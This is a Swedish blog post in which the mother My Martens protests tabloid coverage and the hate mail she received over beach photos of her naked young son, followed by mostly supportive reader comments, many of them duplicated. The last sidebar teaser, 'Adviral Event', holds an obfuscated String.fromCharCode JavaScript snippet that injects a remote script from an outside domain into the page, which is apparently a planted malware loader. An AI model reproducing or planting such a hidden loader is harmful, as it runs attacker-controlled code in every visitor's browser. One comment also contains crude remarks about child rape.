Hatmail & hot! Jo, tack! Vissa människor har verkligen ingenting vettigt att lägga sin energi på!

IMG_6375

 

Men för helvete rent ut sagt! Nu är jag inte bara irriterad, nu är jag riktigt j*vla förbannad!!!

Denna rubrik tillsammans med denna bilden skapade lite oplanerat kaos i mitt liv ikväll skulle man kunna säga! Expressen/kvällsposten lade upp den på nätet!

Någon taggade mig i denna på facebook då den publicerades utan tillhörande artikel.

Rubriker är till för att sälja lösnummer! Punkt! Det behöver man inte vara en Einstein för att kunna förstå!

Efter ett par timmar publicerades den tillhörande artikeln tillsammans med bilden. Då man tydligt kan förstå att jag INTE har blivit anmäld för nakenbilder på min son!

Artikeln handlar om ett instgram/blogg bråk mellan läsare/följare då man har blandade åsikter kring denna bilden! Sedan har instagram tagit bort bilden då någon förmodligen har anmält den som olämpigt innehåll och därefter har den alltså tagits bort utav ”instagram”

Hur eller hur så lever vi i en grym värld med en massa galenskap både IRL & på nätet. Jag personligen anser inte att dessa bilder på något sett skulle vara sexuella, och skulle man uppfatta det så så anser jag att man är grymt störd & då behöver hjälp! Jag skulle aldrig medvetet stötta sådan sjuka människor som sexförbrytare & pedofiler!

Min syn på dessa bilder är ett alldagligt inlägg från en nästintill folktom strand där Ludvig och jag hade egentid kvalitetstid deluxe, bara han och jag. Naken sandig och extremt lycklig! jag tog några bilder med mobilen och la upp dessa bilderna på bloggen då det var första gången på hela sommaren som vi varit på stranden…..

Nu, just precis nu så mail-bombas jag på facebook,  instagram och här på bloggen. Jag började i ett tappert försök att besvara mailen, men det är OMÖJLIGT att hinna med!

Plötsligt har det dykt upp läsare/följare som ska anmäla mig till socialen pga utav vanskötsel utav min son. So påstår att jag har en sjuk sexuell läggning då jag ”bjuder ut” min son på detta viset. Jag får höra att jag är ful, äcklig, oansvarsfull och inte borde få kalla mig mamma! Är det rätt?! Det kan absolut bli missförstånd om saker, man kan även ha delade åsikter och ibland vara överens om att man inte är överens. MEN dessa hundratals HAT-Mail som just nu inkommer genom alla olika forum anser jag mig inte ha gjort mig förtjänt utav! Elaka kommentarer och ett och annat hot! Det är ju helt sjukt!

Jag ber om ursäkt om jag har upprört er på något sett. Det kanske inte var helt genomtänkt att lägga upp dessa ”vackra” sommar bilder på min son. Jag hade verkligen ingen baktanke med dessa bilder utan delade bara med mig utav en lugn, skön och fantastik dag med min älskade Ludvig! / En upprörd mamma! My Martens

PS: Stort TACK för alla kärleksfulla och omtänksamma mail <3

64 Komentarer

 1. Otroligt sorgligt när folk förstör en vacker bild på ett barn en härlig sommardag. Skärpning gott folk! Man undrar vad ni har i huvudet alla ni som tänker sexualisering så fort något ni ser ett barn lekande i sommarvärmen.

 2. Håller på dig My, du är ju en underbar mamma som faktiskt verkar räcka till för din son, fast du har företag och en massa annat för dig. Du är en underbar förebild fylld av glädje, och man ser hur lycklig din son är med sin mamma. Jag lider med dig, nu när det finns människor som skickar dessa mail till dig. Men du har ju visat genom åren, att du är en stark människa. Står på dig My! Det är fruktansvärt vad fel det kan bli ibland, av något som du bara är lycklig av. Jag skriver själv blogg, och är alldeles för öppen, och jag vet att en del störs över det, men jag är ju ingen känd person så jag blir inte anmäld (inte än, vem vet?).
  Lycka till med den här fighten! Kramis!

 3. Jag håller helt med dig, det är sjukt att skicka hatmejl till dig på grund av bilderna. Det är så fegt att hoppa på dig på detta sätt. Jag är helt övertygad om att dina avsikter bara var att vissa upp din helmysiga lille kille, en solig sommardag på stranden. Men på grund av alla sjuka människor som finns i världen är det kanske säkrast att låta kläderna vara på…

 4. Vännen, ibland gör vi något spontant där vi bara ser det fina och oskyldiga i det och det är precis det du gjorde…
  Istället för att ”snällt” påpeka för dig att en viss risk finns om att pedofiler och andra ostabila människor tittar på bilderna så att du kanske själv väljer att ta bort bilderna pga. detta så väljer vissa människor att döma, attackera, hota, kränka dig angående detta men av även helt andra orsaker.
  Varför måste vissa personer alltid ta ”tillfället i akt” för att nedvärdera andra istället för att bara tipsa om att ”tänk på att …”…
  Jag slutar aldrig förvånas över hur elaka vi kan vara gentemot varandra och hur snabba människor är på att döma när de sitter i trygghet bakom en dator. Att tycka och ha andra åsikter är underbart då livet vore allt för tråkigt om alla gick och tyckte samma om allt i världen men att ta alla tillfällen i akt för att kränka tyder bara på brist på respekt för våra olika åsikter och framförallt för att man kanske inte alltid ser det andra ser i vissa avseenden.
  Du är en underbar människa, vän och mamma och låt inte fördomsfulla människor som inte kan uttrycka något på ett vettigt sätt få dig att tro något annat.
  Kram på dig <3

 5. Otroligt sorgligt när folk förstör en vacker bild på ett barn en härlig sommardag. Skärpning gott folk! Man undrar vad ni har i huvudet alla ni som tänker sexualisering så fort något ni ser ett barn lekande i sommarvärmen.

 6. Håller på dig My, du är ju en underbar mamma som faktiskt verkar räcka till för din son, fast du har företag och en massa annat för dig. Du är en underbar förebild fylld av glädje, och man ser hur lycklig din son är med sin mamma. Jag lider med dig, nu när det finns människor som skickar dessa mail till dig. Men du har ju visat genom åren, att du är en stark människa. Står på dig My! Det är fruktansvärt vad fel det kan bli ibland, av något som du bara är lycklig av. Jag skriver själv blogg, och är alldeles för öppen, och jag vet att en del störs över det, men jag är ju ingen känd person så jag blir inte anmäld (inte än, vem vet?).

  Lycka till med den här fighten! Kramis!

 7. Jag håller helt med dig, det är sjukt att skicka hatmejl till dig på grund av bilderna. Det är så fegt att hoppa på dig på detta sätt. Jag är helt övertygad om att dina avsikter bara var att vissa upp din helmysiga lille kille, en solig sommardag på stranden. Men på grund av alla sjuka människor som finns i världen är det kanske säkrast att låta kläderna vara på…

 8. Stå på dig o va stark. Finner inget fel med bilden.
  Kanske låter fel men han visar ju bara gumpen o vem har inte sett en gump innan?

 9. Vännen, ibland gör vi något spontant där vi bara ser det fina och oskyldiga i det och det är precis det du gjorde…

  Istället för att ”snällt” påpeka för dig att en viss risk finns om att pedofiler och andra ostabila människor tittar på bilderna så att du kanske själv väljer att ta bort bilderna pga. detta så väljer vissa människor att döma, attackera, hota, kränka dig angående detta men av även helt andra orsaker.

  Varför måste vissa personer alltid ta ”tillfället i akt” för att nedvärdera andra istället för att bara tipsa om att ”tänk på att …”…

  Jag slutar aldrig förvånas över hur elaka vi kan vara gentemot varandra och hur snabba människor är på att döma när de sitter i trygghet bakom en dator. Att tycka och ha andra åsikter är underbart då livet vore allt för tråkigt om alla gick och tyckte samma om allt i världen men att ta alla tillfällen i akt för att kränka tyder bara på brist på respekt för våra olika åsikter och framförallt för att man kanske inte alltid ser det andra ser i vissa avseenden.

  Du är en underbar människa, vän och mamma och låt inte fördomsfulla människor som inte kan uttrycka något på ett vettigt sätt få dig att tro något annat.

  Kram på dig <3

 10. Stå på dig o va stark. Finner inget fel med bilden.
  Kanske låter fel men han visar ju bara gumpen o vem har inte sett en gump innan?

 11. Det är den Amerikanska moralen, allt nakenhet, bröst, framdelar och bakdelar ska inte finnas på vanliga sajter utan bara på sidor för personer över 18 år. Samma gäller Facebook, Twitter och andra sidor.

  • Det är på grund av Facebook-mentaliteten jag ofta uppmuntrar folk till att inte skriva där, utan vara på sina egna forum och plattformer där Facebooks stasi-modereringar inte gäller. Man gör naturligtvis som man vill och det värsta jag vet är när folk tror att de kan bestämma över andra, utifrån sina egna personliga åsikter. Det är lite som när den gamla gubben stoppar de där ungarna från att åka skateboard på allmän plats för att HAN tycker det är fel. Det funkar inte så, även om vissa – lyckligtvis en minoritet – tycks tro det ibland.

 12. Det är den Amerikanska moralen, allt nakenhet, bröst, framdelar och bakdelar ska inte finnas på vanliga sajter utan bara på sidor för personer över 18 år. Samma gäller Facebook, Twitter och andra sidor.

  • Det är på grund av Facebook-mentaliteten jag ofta uppmuntrar folk till att inte skriva där, utan vara på sina egna forum och plattformer där Facebooks stasi-modereringar inte gäller. Man gör naturligtvis som man vill och det värsta jag vet är när folk tror att de kan bestämma över andra, utifrån sina egna personliga åsikter. Det är lite som när den gamla gubben stoppar de där ungarna från att åka skateboard på allmän plats för att HAN tycker det är fel. Det funkar inte så, även om vissa – lyckligtvis en minoritet – tycks tro det ibland.

 13. Stå på dig My!!! Tragiskt att en så fin sommarbild kan mottas så fel. Än en gång har den svenska avundssjukan slagit till.-) Tycker att de som stör sig av bloggen borde sluta läsa den då, istället för att ge sig på en ensamstående mamma som gör allt för sin son!
  Är ensamstående mamma på heltid till en snart 4 -årig tjej och inspireras av din blogg , styrka och hur du får vardagen att gå ihop:-)
  Styrke kramar

  • Kan fråga dig motsatsen.. Varför ska man inte kunna lägga upp vilka bilder man vill? Och naket? Man ser inget som en helt normal person bara skulle se som normala gulliga bilder. Naket är subjektivt. Visst finns det pedofiler men man ska inte våga leva livet pågrund av någon annan sjuk människa.

  • M skrev ”VARFÖR i hela friden lägger man upp en nakenbild på sitt barn, oavsett ålder?”
   För att man vill dela med sig av en händelse i sitt liv och den involverade ens barn som för stunden var naket?

 14. Stå på dig My!!! Tragiskt att en så fin sommarbild kan mottas så fel. Än en gång har den svenska avundssjukan slagit till.-) Tycker att de som stör sig av bloggen borde sluta läsa den då, istället för att ge sig på en ensamstående mamma som gör allt för sin son!

  Är ensamstående mamma på heltid till en snart 4 -årig tjej och inspireras av din blogg , styrka och hur du får vardagen att gå ihop:-)

  Styrke kramar

  • Kan fråga dig motsatsen.. Varför ska man inte kunna lägga upp vilka bilder man vill? Och naket? Man ser inget som en helt normal person bara skulle se som normala gulliga bilder. Naket är subjektivt. Visst finns det pedofiler men man ska inte våga leva livet pågrund av någon annan sjuk människa.

  • M skrev ”VARFÖR i hela friden lägger man upp en nakenbild på sitt barn, oavsett ålder?”

   För att man vill dela med sig av en händelse i sitt liv och den involverade ens barn som för stunden var naket?

 15. My, jag säger bara. Strunta i vad hatarna skriver till dig. Lägg ut vad du vill. Visst finns det pedofiler, men när helt vanligt folk blir så upphetsade av att du lägger upp såna bilder att de tror sig ha rätt att hota dig då kan du nog också förstå att problemet inte ligger i dina bilder utan snarare i folket som skriver strunt. Jag tycker du ska fortsätta lägga upp vilka bilder du vill och strunta i vad andra moraltanter och gubbar tycker! Stå på dig!
  Kram

 16. My, jag säger bara. Strunta i vad hatarna skriver till dig. Lägg ut vad du vill. Visst finns det pedofiler, men när helt vanligt folk blir så upphetsade av att du lägger upp såna bilder att de tror sig ha rätt att hota dig då kan du nog också förstå att problemet inte ligger i dina bilder utan snarare i folket som skriver strunt. Jag tycker du ska fortsätta lägga upp vilka bilder du vill och strunta i vad andra moraltanter och gubbar tycker! Stå på dig!

  Kram

 17. Men herregud, tänk att folk inte har något bättre att göra än att klaga på vad andra gör. Det du lagt ut är bilder på din son på en strand. Ja han är naken. Och? Självklart ska man kunna lägga ut sådana bilder på nätet om man vill det. De flesta av oss människor, ja de vettiga i alla fall, ser ett lyckligt barn som leker på en strand. Det där med nakenheten är inget som vi reflekterar över. Jag gjorde det i alla fall inte. Och felet ligger självklart inte hos dig som lagt ut de här bilderna på din son. Det ligger hos dem som anser att de har rätt att klanka ner på dig för att du gjort det. Säkerligen är det bitterf***or som inte har något bättre att lägga sin energi på. Tänk att vissa tycker det är så roligt att sitta på sina höga hästar och klaga på andra. De borde gå mer efter ”sköt dig själv och skit i andra”.

 18. Vill ge dej mitt stöd då jag såg den i Expressen! Detta är en bild som även jag skulle kunna lägga ut på min Blogg! Visar inget annat än en härlig sommar vid vattnet och det går inte att säga något om vem det är å det är inget som visar framsidan av kroppen! Själv vill jag inte visa ansikten på mina bilder när de blir offentliga och detta är en foto som kunde varit mina barnbarn. Måste väl vara Pedofil som gillar ett bra taget foto, ehh…!!! Du har absolut inget att skämmas över och det kommer inte din grabb göra när han blir vuxen! Studentbilderna på mina Tjejer var nog skämmigare med potträning!! Kram från en mormor

 19. En superhärlig bild på det absolut bästa som finns för en mamma, sitt barn! Det finns alltid människor som har synpunkter om allt! Dom som ser ner på andra bör se upp för sig själva! Du är iallafall en fantastisk mamma i mina ögon! Många kramar till dig & din lille prins <3 (nu ska jag hem och få klätterhortensian som jag precis inhandlat hos dig i jorden) ?

 20. Men herregud, tänk att folk inte har något bättre att göra än att klaga på vad andra gör. Det du lagt ut är bilder på din son på en strand. Ja han är naken. Och? Självklart ska man kunna lägga ut sådana bilder på nätet om man vill det. De flesta av oss människor, ja de vettiga i alla fall, ser ett lyckligt barn som leker på en strand. Det där med nakenheten är inget som vi reflekterar över. Jag gjorde det i alla fall inte. Och felet ligger självklart inte hos dig som lagt ut de här bilderna på din son. Det ligger hos dem som anser att de har rätt att klanka ner på dig för att du gjort det. Säkerligen är det bitterf***or som inte har något bättre att lägga sin energi på. Tänk att vissa tycker det är så roligt att sitta på sina höga hästar och klaga på andra. De borde gå mer efter ”sköt dig själv och skit i andra”.

 21. Vill ge dej mitt stöd då jag såg den i Expressen! Detta är en bild som även jag skulle kunna lägga ut på min Blogg! Visar inget annat än en härlig sommar vid vattnet och det går inte att säga något om vem det är å det är inget som visar framsidan av kroppen! Själv vill jag inte visa ansikten på mina bilder när de blir offentliga och detta är en foto som kunde varit mina barnbarn. Måste väl vara Pedofil som gillar ett bra taget foto, ehh…!!! Du har absolut inget att skämmas över och det kommer inte din grabb göra när han blir vuxen! Studentbilderna på mina Tjejer var nog skämmigare med potträning!! Kram från en mormor

 22. En superhärlig bild på det absolut bästa som finns för en mamma, sitt barn! Det finns alltid människor som har synpunkter om allt! Dom som ser ner på andra bör se upp för sig själva! Du är iallafall en fantastisk mamma i mina ögon! Många kramar till dig & din lille prins <3 (nu ska jag hem och få klätterhortensian som jag precis inhandlat hos dig i jorden) 😉

 23. Hej My. Du är ju uppenbarligen inte helt jävla efterbliven som så många andra.
  Bra det.
  Det goda hatet …
  Ja, vi har haft sexualundervisning för barn. Vi har haft nakna barn på stranden. Vi har haft föräldrar som utan problem har behövt tänka efter om det var korrekt att ta en bild på sina barn.
  Vi har haft ett samhälle där kyrkan har förlorat sin makt, där fördomar och ideologier utan grund har fått stå undan för vetenskap och fakta.
  Bra skit.
  En gång i tiden var det någon som kanske hade skrivit i #synthare (IRC-kanal med hårdare ordalag) eller på säg Helgon (ungdomscommunity för folk som känner sig mer unika än andra) eller Darkside (BDSM, HBTQ med vänner plattform (antagligen inte där)) ”Nej jag vill inte knulla din fula unge!”, och den personen hade ju en poäng.
  Alla vill inte våldta barn. Och t.o.m. pedofilerna är kanske kräsna ..
  Och vad säger att det blir bättre av att saker och ting döljs? Se på sexualiseringen av allt vad kvinnokropp heter hos män från de kulturer där kvinnokroppen är dold. Där det i princip påstås att de inte har något val utan bara är tvungna att våldta^Wpåtvinga sig samlag med kvinnan i fråga även om hennes mun säger nej. Hennes kropp sade ju ja ..
  Vi hade jättecoola regler om fotografering nyss. I princip var det så enkelt som att allt fick fotograferas förutom skyddsobjekten. En fantastisk möjlighet och frihet.
  Idag skall alla friheter offras för en tänkt fiende i form av terrorism, barnvåldtäktsmän eller för den delen nazister. Man kan ju fråga sig vad som är det största hotet =P
  Hur som helst, poängen är att folk inte behöver vara så jävla skitnödiga. Det finns säkert både turister och invandrare som känner sig obekväma över nakna badande barn eller tjejer som inte är inlindande i tre lager sängöverkast.
  I slutändan är det i huvudet på förövaren hotet sitter.
  Vi har bilder på mig och min syster från luciatåg, om jag hade barn hade jag också velat få ha foton från aktiviteter med mina barn utan att någon oroar sig för vad alla pedofiler skulle göra om de kom över fotomaterialet ..

 24. Det kan ju kanske vara så att samhället är för tryggt?
  Att folk inte har något verkligt att oroa sig över?
  Hur många barn på svenska badstränder blir våldtagna?
  Hur många ”rasister” dödar någon av en annan ras, kultur, religion, ..?
  Hur många terrorbrott har inträffat och hur många har vi lyckats stoppa från att ske?
  .. relativt hur många tar sitt liv på ett år exempelvis?
  .. hur många fall av misshandel skapar alkoholkonsumtionen?
  .. hur många barn mobbas i skolan?
  .. hur många djur lever inte de liv de själva hade valt?

 25. Hej My. Du är ju uppenbarligen inte helt jävla efterbliven som så många andra.

  Bra det.

  Det goda hatet …

  Ja, vi har haft sexualundervisning för barn. Vi har haft nakna barn på stranden. Vi har haft föräldrar som utan problem har behövt tänka efter om det var korrekt att ta en bild på sina barn.

  Vi har haft ett samhälle där kyrkan har förlorat sin makt, där fördomar och ideologier utan grund har fått stå undan för vetenskap och fakta.

  Bra skit.

  En gång i tiden var det någon som kanske hade skrivit i #synthare (IRC-kanal med hårdare ordalag) eller på säg Helgon (ungdomscommunity för folk som känner sig mer unika än andra) eller Darkside (BDSM, HBTQ med vänner plattform (antagligen inte där)) ”Nej jag vill inte knulla din fula unge!”, och den personen hade ju en poäng.

  Alla vill inte våldta barn. Och t.o.m. pedofilerna är kanske kräsna ..

  Och vad säger att det blir bättre av att saker och ting döljs? Se på sexualiseringen av allt vad kvinnokropp heter hos män från de kulturer där kvinnokroppen är dold. Där det i princip påstås att de inte har något val utan bara är tvungna att våldta^Wpåtvinga sig samlag med kvinnan i fråga även om hennes mun säger nej. Hennes kropp sade ju ja ..

  Vi hade jättecoola regler om fotografering nyss. I princip var det så enkelt som att allt fick fotograferas förutom skyddsobjekten. En fantastisk möjlighet och frihet.

  Idag skall alla friheter offras för en tänkt fiende i form av terrorism, barnvåldtäktsmän eller för den delen nazister. Man kan ju fråga sig vad som är det största hotet =P

  Hur som helst, poängen är att folk inte behöver vara så jävla skitnödiga. Det finns säkert både turister och invandrare som känner sig obekväma över nakna badande barn eller tjejer som inte är inlindande i tre lager sängöverkast.

  I slutändan är det i huvudet på förövaren hotet sitter.

  Vi har bilder på mig och min syster från luciatåg, om jag hade barn hade jag också velat få ha foton från aktiviteter med mina barn utan att någon oroar sig för vad alla pedofiler skulle göra om de kom över fotomaterialet ..

 26. Det kan ju kanske vara så att samhället är för tryggt?

  Att folk inte har något verkligt att oroa sig över?

  Hur många barn på svenska badstränder blir våldtagna?

  Hur många ”rasister” dödar någon av en annan ras, kultur, religion, ..?

  Hur många terrorbrott har inträffat och hur många har vi lyckats stoppa från att ske?

  .. relativt hur många tar sitt liv på ett år exempelvis?
  .. hur många fall av misshandel skapar alkoholkonsumtionen?
  .. hur många barn mobbas i skolan?
  .. hur många djur lever inte de liv de själva hade valt?

 27. Jag tycker att grundregeln alltid är att fundera på om den på bilden skulle godkänna att de publiceras. Nu är han ju bara tre år, men eftersom de bilderna inte visar han ansikte tycker jag det är helt ok. Bilderna är för övrigt jättefina!
  Helt galet att folk måste gå så långt som du beskriver!!! Stå på dig, det är du som vet vad som är bäst för dig och din son.

 28. Jag tycker att grundregeln alltid är att fundera på om den på bilden skulle godkänna att de publiceras. Nu är han ju bara tre år, men eftersom de bilderna inte visar han ansikte tycker jag det är helt ok. Bilderna är för övrigt jättefina!

  Helt galet att folk måste gå så långt som du beskriver!!! Stå på dig, det är du som vet vad som är bäst för dig och din son.

 29. Tråkigt med människor som inte har annat att göra än att hitta ”fel” hos andra. Du gör vad som känns bäst för dig och din son och känn dig stolt. Jättefina bilder, helt oskyldiga i min mening.

 30. Hej!
  Bilden är väldigt vacker! Och du är troligtvis den bästa mamman din son kan ha!! Att folk inte klarar av att dölja sin avundsjuka eller känner att dom måste klanka ner på andra är inte värt att lägga energi på! Du är toppen!!

 31. Tråkigt med människor som inte har annat att göra än att hitta ”fel” hos andra. Du gör vad som känns bäst för dig och din son och känn dig stolt. Jättefina bilder, helt oskyldiga i min mening.

 32. Jag är på din sida My. Men man ska alltid vara försiktig med att lägga ut bilder på andra, inkl egna barn. Nakenbilder är intima och privata, och barnet kanske inte tycker det känns ok när det blir äldre. Ett foto som lagts ut på nätet går aldrig att radera. Så var försiktig, men jag tycker inte att du gjort något fel.

 33. Det handlar inte enbart om rädsla för pedofiler för man kan inte vara rädd för allt!!! Jag tycker att även små barn har rätt till integritet och ett privatliv. Barn är ingen ägodel som ”man gör som man vill med”, vilket flera här tycks anse. Om en vuxen person vill berätta om sin vardag och lägga ut bilder så må det vara så men att exponera en annan person ( må vara ens eget barn) bör ske med eftertanke. Jag avskyr mobbare men om hel klassen har sett min snopp eller snippa eller varför inte rumpan så kanske det kan bli en knepig situation i skolan längre fram. De här bilderna ligger ju kvar länge. Sedan finns det samlare som plockar bilder från naiva dumma bloggare där det finns nakna barn och lägger upp dem på porrsajter. DET är väl ändå inte så kul……Barn kan vara nakna ändå!! Visste ni inte det?

 34. Hej!
  Bilden är väldigt vacker! Och du är troligtvis den bästa mamman din son kan ha!! Att folk inte klarar av att dölja sin avundsjuka eller känner att dom måste klanka ner på andra är inte värt att lägga energi på! Du är toppen!!

 35. Oj jösses. När jag såg den på din instagram så tänkte jag den här borde röstas fram till bästa sommarbilden. En helt underbar bild. Men att det var så många som måste kritisera dig för denna bild är chockartat. Denna värld och dessa människor som orkar hålla på, förstår inte. Det är nackdelen med social media att folk enkelt kan ha så mycket åsikter. Stå på dig! Kram towe.

 36. Jag är på din sida My. Men man ska alltid vara försiktig med att lägga ut bilder på andra, inkl egna barn. Nakenbilder är intima och privata, och barnet kanske inte tycker det känns ok när det blir äldre. Ett foto som lagts ut på nätet går aldrig att radera. Så var försiktig, men jag tycker inte att du gjort något fel.

 37. Det handlar inte enbart om rädsla för pedofiler för man kan inte vara rädd för allt!!! Jag tycker att även små barn har rätt till integritet och ett privatliv. Barn är ingen ägodel som ”man gör som man vill med”, vilket flera här tycks anse. Om en vuxen person vill berätta om sin vardag och lägga ut bilder så må det vara så men att exponera en annan person ( må vara ens eget barn) bör ske med eftertanke. Jag avskyr mobbare men om hel klassen har sett min snopp eller snippa eller varför inte rumpan så kanske det kan bli en knepig situation i skolan längre fram. De här bilderna ligger ju kvar länge. Sedan finns det samlare som plockar bilder från naiva dumma bloggare där det finns nakna barn och lägger upp dem på porrsajter. DET är väl ändå inte så kul……Barn kan vara nakna ändå!! Visste ni inte det?

 38. Oj jösses. När jag såg den på din instagram så tänkte jag den här borde röstas fram till bästa sommarbilden. En helt underbar bild. Men att det var så många som måste kritisera dig för denna bild är chockartat. Denna värld och dessa människor som orkar hålla på, förstår inte. Det är nackdelen med social media att folk enkelt kan ha så mycket åsikter. Stå på dig! Kram towe.

 39. Herregud vad ska man tänka om sånt.. Hot och anmälan för att din sons halva rumpa syns på nätet…???!!! Vart är världen på väg…? Tycker att alla fylle o fest Biler som kreti o pleti postar upp på nätet är MYCKET VÄRRE .. Tycker bilden är fint o konstnärlig och fri.. Men det blev ju ett himla liv mot Katrin z när hennes son var utan blöja så jag är inte förvånad. Bloggare måste va ytterst försiktiga då massa galna sitter för bakom datorerna ..

 40. Men herregud vad ledsen jag blir när jag läser vad folk skrivit till dig!
  Det är ju DITT val vad du väljer att lägga upp för bilder och oavsett om gör det själv eller inte så har ingen rätt att hacka på dig!
  Det är dubbelt att lägga ut bilder visst eftersom det finns sjuka människor men ska vi censurera hela vårt samhälle för dessa galningars skull! Och vilka signaler sänder vi till våra barn om vi agerar som att vackra sommarbilder är något fult???
  Tack för att du vågar stå på dig och stå för dina åsikter!
  Det borde finnas fler som du i detta land.
  Kram en som läser din blogg för första gången!

 41. Ville bare si:Screw them,My!!All the haters.Du virker som en fantastisk flott jente,og mamma.Begynte å lese bloggen din etter å ha sett deg lete etter kjærligheten på TV.Programmet ble også sendt på norsk TV 3 ;)Det er helt tragisk at det kan bli så mye styr pga noen uskyldige bilder..Ønsker deg masse lykke til videre!Kommer jeg til
  Øland en dag,tar jeg med datteren min på 4, og hilser på deg i butikken:)Stor klem fra mamma i Norge

 42. Herregud vad ska man tänka om sånt.. Hot och anmälan för att din sons halva rumpa syns på nätet…???!!! Vart är världen på väg…? Tycker att alla fylle o fest Biler som kreti o pleti postar upp på nätet är MYCKET VÄRRE .. Tycker bilden är fint o konstnärlig och fri.. Men det blev ju ett himla liv mot Katrin z när hennes son var utan blöja så jag är inte förvånad. Bloggare måste va ytterst försiktiga då massa galna sitter för bakom datorerna ..

 43. Men herregud vad ledsen jag blir när jag läser vad folk skrivit till dig!
  Det är ju DITT val vad du väljer att lägga upp för bilder och oavsett om gör det själv eller inte så har ingen rätt att hacka på dig!
  Det är dubbelt att lägga ut bilder visst eftersom det finns sjuka människor men ska vi censurera hela vårt samhälle för dessa galningars skull! Och vilka signaler sänder vi till våra barn om vi agerar som att vackra sommarbilder är något fult???
  Tack för att du vågar stå på dig och stå för dina åsikter!
  Det borde finnas fler som du i detta land.
  Kram en som läser din blogg för första gången!

 44. Ville bare si:Screw them,My!!All the haters.Du virker som en fantastisk flott jente,og mamma.Begynte å lese bloggen din etter å ha sett deg lete etter kjærligheten på TV.Programmet ble også sendt på norsk TV 3 ;)Det er helt tragisk at det kan bli så mye styr pga noen uskyldige bilder..Ønsker deg masse lykke til videre!Kommer jeg til
  Øland en dag,tar jeg med datteren min på 4, og hilser på deg i butikken:)Stor klem fra mamma i Norge

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/